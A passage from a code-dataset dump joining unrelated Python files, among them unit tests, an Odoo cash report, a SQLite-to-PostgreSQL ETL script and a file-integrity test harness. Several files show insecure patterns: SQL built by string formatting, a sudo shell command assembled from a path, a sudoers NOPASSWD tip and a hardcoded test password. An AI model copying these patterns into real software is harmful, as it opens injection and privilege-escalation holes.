cpu_distribution.distribute_node_cpus(numa_nodes, components))\n        self.assertEquals(saved_numa_nodes, numa_nodes)\n\n    def test_one_component(self):\n        numa_nodes = [\n            {'cpus': [0, 1, 2]},\n            {'cpus': [3, 4, 5]}]\n        components = [\n            {'name': 'nova',\n             'required_cpus': 5},\n            {'name': 'dpdk',\n             'required_cpus': 0}]\n        expected_data = {\n            'components': {\n                'nova': [0, 1, 2, 3, 4],\n                'dpdk': []\n            },\n            'isolated_cpus': [0, 1, 2, 3, 4]\n        }\n        self.assertEquals(\n            expected_data,\n            cpu_distribution.distribute_node_cpus(numa_nodes, components))\n\n    def test_few_cpus_required(self):\n        numa_nodes = [\n            {'cpus': [0, 1, 2]},\n            {'cpus': [3, 4, 5]}]\n        components = [\n            {'name': 'nova',\n             'required_cpus': 1},\n            {'name': 'dpdk',\n             'required_cpus': 1}]\n        expected_data = {\n            'components': {\n                'dpdk': [0],\n                'nova': [1]\n            },\n            'isolated_cpus': [0, 1]\n        }\n        self.assertEquals(\n            expected_data,\n            cpu_distribution.distribute_node_cpus(numa_nodes, components))\n\n    def test_no_cpus_required(self):\n        numa_nodes = [\n            {'cpus': [0, 1, 2, 3]},\n            {'cpus': [4, 5, 6, 7]}]\n        components = [\n            {'name': 'nova',\n             'required_cpus': 0},\n            {'name': 'dpdk',\n             'required_cpus': 0}]\n        expected_data = {\n            'components': {\n                'dpdk': [],\n                'nova': []\n            },\n            'isolated_cpus': []\n        }\n        self.assertEquals(\n            expected_data,\n            cpu_distribution.distribute_node_cpus(numa_nodes, components))\n","sub_path":"nailgun/nailgun/test/unit/test_cpu_distribution.py","file_name":"test_cpu_distribution.py","file_ext":"py","file_size_in_byte":6196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"478969782","text":"import pytest\nfrom pages.index import loginPage\nfrom pages.index import MainPage\nfrom pages.index import jigouPage\nfrom pages.index import docterPage\nfrom selenium import webdriver\nfrom allure import MASTER_HELPER\n\n\n@MASTER_HELPER.feature(\"Xinzhili: add a doctor\")\nclass TestAdd():\n\n    @MASTER_HELPER.step(\"Initialize and launch the browser\")\n    def setup_class(self):\n        '''Before the test cases run, start the browser and create a Chrome instance'''\n        driver = webdriver.Chrome()\n        driver.maximize_window()\n        self.login_page = loginPage.LoginPage(driver)\n        self.jigou_page = jigouPage.jigouPage(driver)\n        self.docter_page=docterPage.docterPage(driver)\n        self.main_page = MainPage.MainPage(driver)\n\n    @MASTER_HELPER.step(\"Close the browser\")\n    def teardown_class(self):\n        '''After the test cases finish, close the browser'''\n        self.login_page.quit()\n\n\n\n    @MASTER_HELPER.testcase(\"Test case: delete a single doctor\")\n    def test_delonedocter_001(self):\n\n        with MASTER_HELPER.step(\"Delete a single doctor\"):\n            self.login_page.xinzhili_login(username=\"beifang\", password=\"111111\")\n            self.jigou_page.xinzhili_clickyiyuanguanli()\n            self.jigou_page.xinzhili_clcikjigouname()\n            self.jigou_page.xinzhili_clickkeshi()\n            self.docter_page.xinzhili_delonedocter()\n            assert_xzl_deloneyisheng=('xpath','//*[@id=\"wrapper\"]/div/div/div[2]/div/section/div[2]/div/div/div/div[3]/div/div/div/div/div[2]/span')\n            # \"暂无数据\" (\"no data yet\") is the literal text rendered by the UI, so it must stay in Chinese\n            assert \"暂无数据\"==self.docter_page.get_text(assert_xzl_deloneyisheng)\n\n\n\n\n\n\nif __name__ == '__main__':\n    pytest.main(['-s', 'test_login.py'])","sub_path":"testcase/docter/test_002_deloneyisheng.py","file_name":"test_002_deloneyisheng.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"186778276","text":"from distutils.core import setup, Extension\n\n# src = ['weather_data_module.cpp', 'DataPoint.cpp', 'WeatherData.cpp', 'SunriseSunsetData.cpp', 'MBCFunctions.cpp']\n# module1 = Extension('spam',\n#                     define_macros = [('MAJOR_VERSION', '1'),\n#                                      ('MINOR_VERSION', '0')],\n#                     
include_dirs = ['/usr/local/include'],\n#                     # libraries = ['tcl83'],\n#                     library_dirs = ['/usr/local/lib', '~/python_cpp_test'],\n#                     sources = ['test.cpp'])\n\n# Note: '-std=c++11 -lcurl -lsqlite3' as a single extra_compile_args entry is passed to the\n# compiler as one unrecognized option; the linker flags belong in extra_link_args instead.\nmodule = Extension('weatherStation',\n                   include_dirs = ['/usr/include', '/usr/include/curl'],\n                   library_dirs = ['/usr/lib', '/usr/lib/x86_64-linux-gnu'],\n                   extra_compile_args = ['-std=c++11'],\n                   extra_link_args = ['-lcurl', '-lsqlite3'],\n                   sources = ['weather_data_module.cpp', 'DataPoint.cpp', 'WeatherData.cpp', 'SunriseSunsetData.cpp', 'MBCFunctions.cpp'])\n\nsetup (name = 'PackageName',\n       version = '1.0',\n       description = 'This is a test package',\n       author = 'Roger Hsiao',\n       author_email = 'rogerhh@umich.edu',\n       ext_modules = [module])\n","sub_path":"src/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"207771882","text":"# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport unittest\n\nimport numpy as np\nfrom op_test import OpTest\n\nimport paddle\nimport paddle.fluid as fluid\nimport paddle.fluid.core as core\nimport paddle.tensor as tensor\n\n\nclass TestTraceOp(OpTest):\n    def setUp(self):\n        self.op_type = \"trace\"\n        self.python_api = paddle.trace\n        self.init_config()\n        self.outputs = {'Out': self.target}\n\n    def test_check_output(self):\n        self.check_output(check_eager=True)\n\n    def test_check_grad(self):\n        self.check_grad(['Input'], 'Out', check_eager=True)\n\n    def init_config(self):\n        self.case = np.random.randn(20, 6).astype('float64')\n        self.inputs = {'Input': self.case}\n        self.attrs = {'offset': 0, 'axis1': 0, 'axis2': 1}\n        self.target = np.trace(self.inputs['Input'])\n\n\nclass TestTraceOpCase1(TestTraceOp):\n    def init_config(self):\n        self.case = np.random.randn(2, 20, 2, 3).astype('float32')\n        self.inputs = {'Input': self.case}\n        self.attrs = {'offset': 1, 'axis1': 0, 'axis2': 2}\n        self.target = np.trace(\n            self.inputs['Input'],\n            offset=self.attrs['offset'],\n            axis1=self.attrs['axis1'],\n            axis2=self.attrs['axis2'],\n        )\n\n\nclass TestTraceOpCase2(TestTraceOp):\n    def init_config(self):\n        self.case = np.random.randn(2, 20, 2, 3).astype('float32')\n        self.inputs = {'Input': self.case}\n        self.attrs = {'offset': -5, 'axis1': 1, 'axis2': -1}\n        self.target = np.trace(\n            self.inputs['Input'],\n            offset=self.attrs['offset'],\n            axis1=self.attrs['axis1'],\n            axis2=self.attrs['axis2'],\n        )\n\n\nclass TestTraceAPICase(unittest.TestCase):\n    def test_case1(self):\n        case = np.random.randn(2, 20, 2, 3).astype('float32')\n        data1 = fluid.data(name='data1', shape=[2, 20, 2, 3], dtype='float32')\n        out1 = tensor.trace(data1)\n        out2 = tensor.trace(data1, offset=-5, axis1=1, axis2=-1)\n\n        place = core.CPUPlace()\n        exe = fluid.Executor(place)\n        results = exe.run(\n            fluid.default_main_program(),\n            feed={\"data1\": case},\n            fetch_list=[out1, out2],\n            return_numpy=True,\n        )\n        target1 = np.trace(case)\n        target2 = np.trace(case, offset=-5, axis1=1, axis2=-1)\n        
np.testing.assert_allclose(results[0], target1, rtol=1e-05)\n        np.testing.assert_allclose(results[1], target2, rtol=1e-05)\n\n\nif __name__ == \"__main__\":\n    paddle.enable_static()\n    unittest.main()\n","sub_path":"python/paddle/fluid/tests/unittests/test_trace_op.py","file_name":"test_trace_op.py","file_ext":"py","file_size_in_byte":3119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"153865952","text":"#!/usr/bin/python3\n\n\"\"\"\n977. Squares of a Sorted Array\n\nGiven an array of integers A sorted in non-decreasing order, return an array of the squares of each number, also in sorted non-decreasing order.\n\nExample 1:\n\nInput: [-4,-1,0,3,10]\nOutput: [0,1,9,16,100]\nExample 2:\n\nInput: [-7,-3,2,3,11]\nOutput: [4,9,9,49,121]\n \nNote:\n1 <= A.length <= 10000\n-10000 <= A[i] <= 10000\nA is sorted in non-decreasing order.\n\"\"\"\n\ndef squared_sorted_array(arr):\n    left = 0\n    right = len(arr) - 1\n    result = [ 0 for x in arr]\n\n    # fill result from the largest square down; the stop value must be -1 so that index 0 is filled too\n    for i in range(len(arr)-1, -1, -1):\n        if abs(arr[left]) > abs(arr[right]) :\n            result[i] = arr[left] * arr[left]\n            left += 1\n        else:\n            result[i] = arr[right] * arr[right]\n            right -= 1\n\n    return result\n\narr1 = [ -17, -16, -5, 0, 4, 6, 20]\nprint(squared_sorted_array(arr1))","sub_path":"Python/interview_questions/two pointers/sorted_squared_array.py","file_name":"sorted_squared_array.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"188487680","text":"import openpyxl as op\r\nbook = op.load_workbook(\"excelTest01.xlsx\")\r\nsheetList = book.get_sheet_names()\r\n# print(sheetList)\r\nsheet = book.get_sheet_by_name(sheetList[0]) # get a first sheet\r\n\r\nrows = ((1, 2, 3),\r\n        (2, 3, 4),\r\n        (4, 5, 6)\r\n        )\r\n\r\nfor row in rows:\r\n    sheet.append(row)\r\n\r\nbook.save(\"excelTest01.xlsx\")","sub_path":"excelFileTest02.py","file_name":"excelFileTest02.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"266541081","text":"# -*- coding: utf-8 -*-\nfrom openerp.osv import fields, osv\nfrom openerp import models, fields, api, _\nfrom datetime import datetime, timedelta, date\nfrom dateutil import parser\nimport logging\nimport calendar\nimport base64 \nimport itertools\nimport requests\nimport json\nfrom io import StringIO\nimport io \nfrom . 
import crear_informe_caja_excel\nimport math\nimport time\nimport pytz\nimport openpyxl\nfrom openpyxl import Workbook\nimport openpyxl.worksheet\nimport unicodedata\nfrom openpyxl import Workbook\nfrom openpyxl.styles import PatternFill, Border, Side, Alignment, Protection, Font\nfrom openpyxl.styles.borders import Border, Side\nfrom openpyxl.drawing.image import Image\nimport commands\nimport os\n\n#----------------------------------------------------------\n# Creacion de campos para la pantalla -\n#---------------------------------------------------------- \n\nclass ReporteCaja(models.TransientModel):\n _name=\"reporte.caja\"\n _rec_name = 'titulo'\n\n titulo=fields.Char(string=\"Titulo\",default='Reporte de Caja')\n fecha_desde = fields.Date(string=\"Fecha desde\")\n fecha_hasta = fields.Date(string=\"Fecha hasta\")\n journal_ids=fields.Many2many('account.journal',string='Caja')\n usuario_id=fields.Many2one('res.users',string=\"Usuario\", default=lambda self:self.env.user ,readonly=True)\n fecha_emision = fields.Date(string=\"Fecha Emision\")\n\n filename=fields.Char(string=\"Nombre de archivo\")\n archivo_xls=fields.Binary(string='Archivo Excel')\n filename_pdf=fields.Char(string=\"Nombre de archivo\")\n archivo_pdf=fields.Binary(string='Archivo PDF')\n\n _defaults = {\n 'fecha_emision': fields.datetime.now(),\n }\n\n\n#----------------------------------------------------------\n# Obtencion de datos -\n#---------------------------------------------------------- \n @api.multi\n def consultar(self):\n lista_id=''\n if self.fecha_desde and self.fecha_hasta and self.journal_ids:\n for j in self.journal_ids:\n if lista_id!='':\n lista_id=lista_id+','+str(j.id)\n else:\n lista_id=str(j.id)\n sql=\"\"\"SELECT id from account_voucher where date between '{0}' AND '{1}' and account_journal_caja_id in ({2}) and state in ('posted') order by id,date,number asc\"\"\".format(self.fecha_desde,self.fecha_hasta,lista_id)\n self.env.cr.execute(sql)\n lista_facturas=self.env.cr.dictfetchall()\n lista_facturas_id = [value['id'] for value in lista_facturas]\n obj_datos=self.env['account.voucher'].search([('id','in',lista_facturas_id)])\n dic={}\n lista_datos=[]\n descripcion=''\n for l in obj_datos:\n for det in l.line_cr_ids:\n dic={}\n if det.amount!=0.0:\n obj_move_line=self.env['account.move.line'].search([('id','=',det.move_line_id.id)])\n obj_invoice=self.env['account.invoice'].search([('number','=',obj_move_line.ref)])\n dic={\n 'tipo':l.account_journal_caja_id.categoria_reporte,\n 'numero':l.number,\n 'fecha_pago':l.date,\n #INTEGRACION: SE CAMBIA POR PEDIDO DE CAMBIO DE NUMERO\n #'factura':obj_invoice.number,\n 'factura':obj_invoice.numerofac,\n 'monto':det.amount,\n 'cliente':obj_invoice.alumno_id.name,\n 'banco':l.banco_id.name,\n 'documento':l.documento,\n 'fecha_ch':l.fecha_ch,\n 'comentario':l.narration\n }\n lista_datos.append(dic)\n \n lista_tipo=[]\n for tipos in lista_datos:\n if tipos['tipo'] not in lista_tipo:\n lista_tipo.append(tipos['tipo'])\n\n #-------------------------------------------------------------------------------------------------------------------\n # AGRUPAR LAS CABECERAS -\n # SE AGRUPA LAS JORNADAS,SECCION,CURSO,PARALELO PARA TENER UNA SOLA LISTA DE TODAS SI DUPLICADOS -\n #-------------------------------------------------------------------------------------------------------------------\n lista_cabecera=[]\n dic_cab={}\n for m in lista_datos:\n dic_cab={\n 'tipo':m['tipo'],\n }\n if dic_cab not in lista_cabecera:\n lista_cabecera.append(dic_cab)\n\n\n 
#-------------------------------------------------------------------------------------------------------------------\n # AGRUPAR LAS CABECERAS Y DETALLE -\n # CON LA CABECERAS AGRUPADAS SOLO SE LES AGREGA UNA LISTA CON LOS DETALLES DE LOS ALUMNOS -\n #-------------------------------------------------------------------------------------------------------------------\n lista_completa=[]\n for n in lista_cabecera:\n dic_cab={\n 'tipo':n['tipo'],\n }\n detalle={}\n lista_detalle=[]\n for deta in lista_datos:\n if deta['tipo'] == n['tipo']:\n detalle={\n 'numero':deta['numero'],\n 'fecha_pago':deta['fecha_pago'],\n 'factura':deta['factura'],\n 'monto':deta['monto'],\n 'cliente':deta['cliente'],\n 'banco':deta['banco'],\n 'documento':deta['documento'],\n 'fecha_ch':deta['fecha_ch'],\n 'comentario':deta['comentario'],\n }\n lista_detalle.append(detalle)\n lista_detalle_ordenada=sorted(lista_detalle, key = lambda user: user['numero'])\n\n dic_det={\n 'tipo':n['tipo'],\n 'detalle':lista_detalle_ordenada,\n }\n lista_completa.append(dic_det)\n\n cadena=''\n for fil in self.journal_ids:\n obj_move_line=self.env['account.journal'].search([('id','=',fil.id)])\n if cadena=='':\n cadena=obj_move_line.name\n else:\n cadena=cadena+' ,'+obj_move_line.name\n\n datos={\n 'lista':lista_completa,\n 'cant':len(obj_datos),\n 'filtro':cadena,\n }\n\n return datos\n#-------------------------------------------------------------------------------------------------------------------\n# CREACION DE EXCEL -\n#-------------------------------------------------------------------------------------------------------------------\n\n @api.multi\n def generar_excel(self):\n fp =io.BytesIO()\n workbook = self.crear_excel_info()\n workbook.save(fp)\n self.filename = 'Informe.xlsx'\n self.archivo_xls=base64.b64encode(fp.getvalue()) \n return True\n\n def crear_excel_info(self):\n wb = crear_informe_caja_excel.crear_wb_informe()\n self.crear_informe(wb)\n return wb \n\n\n def crear_informe(self, wb):\n fecha_a = datetime.strptime(self.fecha_emision, '%Y-%m-%d')\n fecha_actual = datetime.strftime(fecha_a, '%d/%b/%Y')\n dic ={\n 'fecha_desde':self.fecha_desde,\n 'fecha_hasta':self.fecha_hasta,\n 'usuario_id':self.usuario_id.name,\n 'fecha_corte':fecha_actual,\n 'company_id':self.usuario_id.company_id.name,\n }\n\n lista_alumnos=[]\n cant_alumno=0\n datos=self.consultar()\n lista_datos=datos['lista']\n cant_datos=datos['cant']\n filtro=datos['filtro']\n\n sheet_info = crear_informe_caja_excel.crea_hoja_info(wb, 'Informe ',0)\n sheet_view = openpyxl.worksheet.SheetView()\n sheet_view.zoomScale = \"130\"\n sheet_view.zoomScaleNormal = \"130\"\n sheet_info.sheet_view = sheet_view\n sheet_info.zoomScale = \"130\"\n crear_informe_caja_excel.Informe(sheet_info, dic,lista_datos,cant_datos,filtro)\n\n#-------------------------------------------------------------------------------------------------------------------\n# CREACION DE PDF -\n#-------------------------------------------------------------------------------------------------------------------\n @api.multi\n def generar_pdf(self):\n filename_pdf=''\n filename_pdf=''\n fp =io.BytesIO()\n workbook = self.crear_excel_info_pdf()\n workbook.save(fp)\n filename_pdf = 'Informe.xlsx'\n archivo_pdf=base64.b64encode(fp.getvalue())\n obj=self.env['ir.attachment']\n obj_xls=obj.create({'res_model':self.id,'name':filename_pdf,'datas':archivo_pdf,'type':'binary','datas_fname':filename_pdf})\n direccion_xls=obj._get_path(obj_xls.datas)[1]\n direccion=obj._get_path(obj_xls.datas)[0]\n 
nombre_bin=obj_xls.store_fname\n nombre_archivo=obj_xls.datas_fname\n separa = direccion_xls.rstrip(direccion)\n os.chdir(separa)\n os.rename(nombre_bin,nombre_archivo)\n commands.getoutput(\"\"\" libreoffice --headless --convert-to pdf *.xlsx\"\"\") \n with open(direccion_xls.rstrip(direccion)+'/'+nombre_archivo.split('.')[0]+'.pdf', \"rb\") as f:\n data = f.read()\n file= data.encode(\"base64\")\n self.write({'filename_pdf':nombre_archivo.split('.')[0]+'.pdf','archivo_pdf':file})\n os.rename(nombre_archivo,nombre_bin)\n obj_xls.unlink()\n \n return True\n\n def crear_excel_info_pdf(self):\n wb = crear_informe_caja_excel.crear_wb_informe()\n self.crear_informe_pdf(wb)\n return wb \n\n def crear_informe_pdf(self, wb):\n fecha_a = datetime.strptime(self.fecha_emision, '%Y-%m-%d')\n fecha_actual = datetime.strftime(fecha_a, '%d/%b/%Y')\n dic ={\n 'fecha_desde':self.fecha_desde,\n 'fecha_hasta':self.fecha_hasta,\n 'usuario_id':self.usuario_id.name,\n 'fecha_corte':fecha_actual,\n 'company_id':self.usuario_id.company_id.name,\n }\n\n lista_alumnos=[]\n cant_alumno=0\n datos=self.consultar()\n lista_datos=datos['lista']\n cant_datos=datos['cant']\n filtro=datos['filtro']\n sheet_info = crear_informe_caja_excel.crea_hoja_info_pdf(wb, 'Informe ',0)\n #sheet_info = crear_informe_cobranza_excel.crea_hoja_info(wb, 'Informe ',0)\n sheet_view = openpyxl.worksheet.SheetView()\n sheet_view.zoomScale = \"70\"\n sheet_view.zoomScaleNormal = \"70\"\n sheet_info.sheet_view = sheet_view\n sheet_info.zoomScale = \"70\"\n crear_informe_caja_excel.Informe_pdf(sheet_info, dic,lista_datos,cant_datos,filtro)","sub_path":"hanibal/ans_reporte/reporte_caja.py","file_name":"reporte_caja.py","file_ext":"py","file_size_in_byte":11150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"622884541","text":"# This line is to be written in the terminal:\n# pip install psycopg2-binary\n\nimport psycopg2\nimport sqlite3\n\n# note: similar to how sqlite3 module worked)\n# terminal: dir(psycopg2)\n# terminal: help(psycopg2.connect)\n\n\n# The following can all be obtained from the element SQL\ndbname = ''\nuser = ''\npassword = '' # do not commit this, or share\nhost = '' # Port should be included or default\n\n\npg_conn = psycopg2.connect(dbname=dbname, user=user, password=password, host=host)\n\n# Note: RPG data from SQLite to PostgreSQL\n# we'd like to get the RPG data out of SQLite and insert it into PostgreSQL.\n# Aka making a datapipeline, aka ETL (extract transform laod)\\\n\npg_curs = pg_conn.cursor()\n\ncreate_table_statement = \"\"\"\nCREATE TABLE test_table (\n id SERIAL PRIMARY KEY,\n name varchar(40) NOT NULL,\n data JSONB\n);\n\"\"\"\npg_curs.execute(create_table_statement)\npg_conn.commit()\n\nquery = \"SELECT * FROM test_table;\"\npg_curs.execute(query)\npg_curs.fetchall()\n\n\nsl_conn = sqlite3.connect('rpg_db.sqlite3')\nsl_curs = sl_conn.cursor()\n\nrow_count = 'SELECT * FROM charactercreator_character'\nsl_curs.execute(row_count).fetchall()\n\nget_characters = 'SELECT * FROM charactercreator_character'\ncharacters = sl_curs.execute(get_characters).fetchall()\n\nsl_curs.execute('PRAGMA table_info(charactercreator_character);').fetchall()\n\ncreate_charactor_table = \"\"\"\nCREATE TABLE charactercreator_character (\n character_id SERIAL PRIMARY KEY,\n name VARCHAR(30),\n level INT,\n exp INT,\n hp INT,\n strength INT,\n intelligence INT,\n dexterity INT,\n wisdom INT\n);\n\"\"\"\npg_curs.execute(create_charactor_table)\npg_conn.commit()\n\nshow_tables = 
\"\"\"\nSELECT\n *\nFROM\n pg_catalog.pg_tables\nWHERE\n schemaname != 'pg_catalog'\nAND schemaname != 'information_schema';\n\"\"\"\n\npg_curs.execute(show_tables)\npg_curs.fetchall()\n\nexample_insert = \"\"\"\nINSERT INTO charactercreator_character\n(name, level, exp, hp, strength, intelligence, dexterity, wisdom)\nVALUES \"\"\" + str(characters[0][1:]) + \";\"\n\nprint(example_insert)\n\nfor character in characters:\n insert_character = \"\"\"\n INSERT INTO charactercreator_character\n (name, level, exp, hp, strength, intelligence, dexterity, wisdom)\n VALUES \"\"\" + str(character[1:]) + \";\"\n pg_curs.execute(insert_character)\n\npg_curs.execute('SELECT * FROM charactercreator_character')\npg_curs.fetchall()\npg_conn.commit()\n\npg_curs.execute('SELECT * FROM charactercreator_character')\npg_characters = pg_curs.fetchall()\n\nfor character, pg_character in zip(characters, pg_characters):\n assert character == pg_character\n\npg_curs.close()\npg_conn.close()\n","sub_path":"module2-sql-for-analysis/assignment_2_1.py","file_name":"assignment_2_1.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"69464961","text":"#!/usr/bin/env python3\n# Test framework for System Integrity Verifier (SIV)\n# used in course ET2595 at BTH\n#\n# Copyright (C) 2019 by Dragos Ilie\n# All Rights Reserved.\n#\n# This code can freely distributed and changed for academic and\n# self-study purposes.\nimport os\nimport argparse\nimport shutil\nimport gzip\nimport subprocess\n\ndef touch(fname, times=None):\n with open(fname, 'a'):\n os.utime(fname, times)\n\ndef echo(fname, text, compress=False):\n if compress:\n with gzip.open(fname, 'wb') as fh:\n fh.write(text.encode('utf-8'))\n else:\n with open(fname, \"w\") as fh:\n print(text, file=fh)\n\ndef populate_env(envdir):\n mytext = \"Hello\"\n muchtext = \"Hello\\n\" * 200\n # Create file if not existing and then write text to it\n echo(envdir + \"/data/x.txt\", mytext)\n # Create a directory (folder)\n os.mkdir(envdir + \"/data/a\")\n # Create a directory (folder)\n os.mkdir(envdir + \"/data/b\")\n # Create file if it does not exist and then set date to \"now\"\n touch(envdir + \"/data/a/blah.txt\")\n # Create a file if it does not exist and compress any contents written to it\n echo(envdir + \"/data/a/blahblah.gz\", muchtext, compress=True)\n\n\ndef change_env(envdir):\n mytext = \"Bye\"\n # Change content\n echo(envdir + \"/data/x.txt\", mytext)\n # Change access time to \"beginning of time\"\n touch(envdir + \"/data/x.txt\", (0,0))\n # File deleted\n os.remove(envdir + \"/data/a/blahblah.gz\")\n # Folder deleted\n os.rmdir(envdir + \"/data/b\")\n # Folder permission bits, owner and group modified\n os.chmod(envdir + \"/data/a\", 0o777)\n\n # To run \"sudo chown\" in below without being prompted \n # for password enter sudo visudo in a terminal\n # Add the following line after the % sudo line:\n #\n # student ALL = (ALL) NOPASSWD: / bin/chown\n os.system('sudo /bin/chown bob:alice ' + envdir + \"/data/x.txt\")\n\n\ndef make_env(envdir):\n # check if env directory exists\n if os.path.exists(envdir):\n overwrite = input(\"Environment exists! 
Overwrite (y/n)?\")\n        if overwrite == 'y':\n            ## Try to remove tree; if failed show an error using try...except on screen\n            try:\n                shutil.rmtree(envdir)\n            except OSError as e:\n                print (\"Error: %s - %s.\" % (e.filename, e.strerror))\n                return False\n        else:\n            print(\"Execution interrupted due to existing environment directory\")\n            return False\n\n    os.makedirs(envdir + \"/data\")\n    return populate_env(envdir)\n\n\ndef siv_init(sivexec, envdir):\n    siv_cmd = [sivexec, '-i', '-D', envdir + '/data', '-V', envdir + '/vDB', '-R', envdir + '/init.txt', '-H', 'sha1']\n    print(' '.join(siv_cmd))\n    result = subprocess.run(siv_cmd, stdout=subprocess.PIPE)\n    print(result.stdout.decode('utf-8'))\n    if result.returncode == 0:\n        print(\"*\"*10 + \"INIT COMPLETED\" + \"*\"*10)\n        return True\n    else:\n        print(\"#\"*10 + \"INIT FAILED\" + \"#\"*10)\n        return False\n\ndef siv_verify(sivexec, envdir):\n    siv_cmd = [sivexec, '-v', '-D', envdir + '/data', '-V', envdir + '/vDB', '-R', envdir + '/verify.txt']\n    print(' '.join(siv_cmd))\n    result = subprocess.run(siv_cmd, stdout=subprocess.PIPE)\n    print(result.stdout.decode('utf-8'))\n    if result.returncode == 0:\n        print(\"*\"*10 + \"VERIFY COMPLETED\" + \"*\"*10)\n        return True\n    else:\n        print(\"#\"*10 + \"VERIFY FAILED\" + \"#\"*10)\n        return False\n\ndef main():\n    parser = argparse.ArgumentParser()\n\n    parser.add_argument(\"-s\", \"--siv\", type=str, dest=\"sivexec\", required=True)\n    parser.add_argument(\"-e\", \"--env\", type=str, dest=\"envdir\", default=\"./submission\")\n    # Do not execute the SIV (because it requires manual exec), just initialize\n    # environment\n    parser.add_argument(\"-i\", \"--init\", dest=\"init_only\", action='store_true')\n    # Do not execute the SIV (because it requires manual exec), just initialize\n    # environment\n    parser.add_argument(\"-v\", \"--verify\", dest=\"verify_only\", action='store_true')\n\n    args = parser.parse_args()\n    if args.init_only is True and args.verify_only is True:\n        print(\"--init and --verify are mutually exclusive. 
Use only one of them\")\n        return -1\n    if os.path.isfile(args.sivexec) is False:\n        print(\"SIV \" + args.sivexec + \" is missing\")\n        return -1\n    if args.verify_only is False:\n        if make_env(args.envdir) is False:\n            print(\"Unable to create environment\")\n            return -1\n    if args.init_only is False and args.verify_only is False:\n        if siv_init(args.sivexec, args.envdir) is False:\n            print(\"Unable to initialize SIV\")\n            return -1\n    if args.init_only is False:\n        change_env(args.envdir)\n    if args.init_only is False and args.verify_only is False:\n        if siv_verify(args.sivexec, args.envdir) is False:\n            print(\"Unable to VERIFY\")\n            return -1\n    print(\"COMPLETED\")\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"test_siv.py","file_name":"test_siv.py","file_ext":"py","file_size_in_byte":4988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"28190194","text":"import requests\nimport json\nimport base64\n\ndef html_to_image(filepath, newfileName):\n\tcreddata = json.load(open('configs/creds.json'))\n\tapi_key = creddata['convertapi']\n\turl = 'https://v2.convertapi.com/html/to/png?Secret=' + api_key\n\tfile = open(filepath, 'r')\n\tfilecontent = file.read()\n\tfilecontent = filecontent.encode(\"utf-8\")\n\tfilecontent_base64_encode = base64.b64encode(filecontent)\n\n\tdata = {\n\t    \"Parameters\": [\n\t        {\n\t            \"Name\": \"File\",\n\t            \"FileValue\": {\n\t                \"Name\": \"bars.html\",\n\t                \"Data\": filecontent_base64_encode.decode(\"utf-8\")\n\t            }\n\t        }\n\t    ]\n\t}\n\n\treq = requests.post(url, json=data)\n\treq = req.json()\n\n\tpng_base64_decode = base64.b64decode(req['Files'][0]['FileData'])\n\n\tpngfile = open('../scrapy-yelp-tripadvisor/tutorial/spiders/data/png/' + newfileName + '.png', 'wb')\n\tpngfile.write(png_base64_decode)\n\n","sub_path":"sendgrid/html_to_image.py","file_name":"html_to_image.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"30260051","text":"from flask import render_template, redirect\nfrom flask.globals import request\n\nfrom airwootProject1 import app\nfrom airwootProject1.channelList import channelList \nfrom forms import IndexForm\n\n\ntime_interval = 0\nc = channelList()\n\n@app.route('/', methods = ['GET', 'POST'])\ndef index():\n    form = IndexForm(csrf_enabled=False)\n    if form.validate_on_submit():\n        global time_interval\n        time_interval = form.interval.data\n        if time_interval <= 0:\n            return redirect('/')\n        return redirect('/connected')\n    return render_template('index.html',\n                           form = form)\n    \n@app.route('/connected', methods = ['GET', 'POST'])\ndef connected():\n    if request.method == 'POST':\n        key = request.get_data()\n        key = key.split(\"=\")[1]\n        c.remove(key)\n        return redirect('/')\n    if time_interval <= 0:\n        return render_template('error.html')\n    else:\n        channel_name = c.generatename()\n        c.add(channel_name, time_interval)\n        return render_template('connected.html', channelname = channel_name, time_interval = time_interval)","sub_path":"airwootProject1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"133477319","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nbar_width = 0.25\n\n# Choose the height of the error bars (bars1)\n\ndfx = pd.read_csv('/home/jordibisbal/WS18-MSc-JordiBisbalAnsaldo--NetworkSlicing/evaluation/experiments/1/winner/winner1.csv')\n\nfig, ax = 
